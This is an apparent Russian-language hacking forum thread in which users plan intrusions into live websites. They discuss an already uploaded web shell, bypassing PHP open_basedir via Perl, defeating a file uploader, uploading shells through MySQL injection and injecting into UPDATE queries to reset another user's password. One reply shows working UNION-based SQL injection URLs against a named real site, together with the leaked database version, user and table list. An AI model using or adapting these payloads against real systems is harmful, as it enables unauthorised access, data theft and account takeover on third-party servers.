Есть залитый шелл, но выбраться выше public_html нельзя из-за open_basedir. Но ls, cat и другие консольные команды работают и позволяют выбраться в public_html любого домена, висящего на этом хосте. В случае если доменов мало, можно просто слить еще один шелл в другой домен и разбираться уже через него, но когда доменов много... Поэтому:
1. Есть ли способы обойти open_basedir? (PHP 5.1.2)
2. Возможно бред, но есть ли веб-шелл, работающий практически полностью на одних консольных командах?

open_basedir не действует на PERL. Попробуй это.

Набираю в Opera:

http://www.ettisalqatar.com/cgi-script/test.pl

http://www.ettisalqatar.com/cgi-bin/test.pl

http://www.ettisalqatar.com/cgi-script/script.pl

http://www.ettisalqatar.com/cgi-bin/script.pl

Не могу найти shell.

И, подскажите статью по заливке Perl Shell.

Заранее всем спасибо.

Есть сайт, он подвержен SQL инъекции, знаю потому что получил лог и пас от админки, но толку с этого мало, так как встроеный в админку загрузчик переименовывает любой фаил по шаблону целиком в .gif Сервер же со своей стороны не дает возможности исполнять gif. Так же хостер (или админ) не дурак и прав у юзера SQL базы недостаточно на чтние /etc/password, выдает пустой экран, в смысле сюль рагирует позитивно но ничего не сгружает (проверял фаер багом на предмет скрытого теста, но пусто). Отсюда резонный вопрос, что посоветуете делать и как извернутся?

чуть не забыл на сервере включенный магические кавычки, но CHAR не лечит, как впрочем 16чная система, прав нет. залить, через sql то же не получилось, возможно что то не так делаю, собственно сам линк инъекции в студии
(попытка чтения етц)
Если резюмировать, то вопросов 2а, как надуть загрузчик фаилов или как правильно залить шел через SQL (MySQL)
Нe и конечно юзер скуль не роот(понятно почему он не читает /etc/passwd), ротового как найти незнаю, у хостера ниче так сайт я дырок ненашел... (mtw.ru)

Есть такой код:
К переменной присваиваю значение:
Получается такой запрос:
но он не работает и ошибки нет никакой

Какие данные отправлять в переменной $nomer что бы установить пароль 123 для username=GivioN ?
Магик. квотес в положении off!

ZeroCold
Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав

По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем

GivioN
Попробуй почитать что-то. Например про оператор union
http://phpclub.ru/mysql/doc/union.html

http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),4+--+

5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:de bian-linux-gnu

http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_conc at(0x0b,table_name),4+from+information_schema.tabl es+--+

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
article,
const,
group,
group_refer,
menu,
news,
rights,
rights_refer,
statpage,
user

Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе.

и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:

https://forum.antichat.ru/showthread.php?t=56221
ON DUPLICATE KEY

При прокачанной удаче хакера может сработать, хотя конечно...

А вообще, иньекции в инсерте крутятся, либо через вывод ошибок, либо more1row, так-что расскручивай как обычно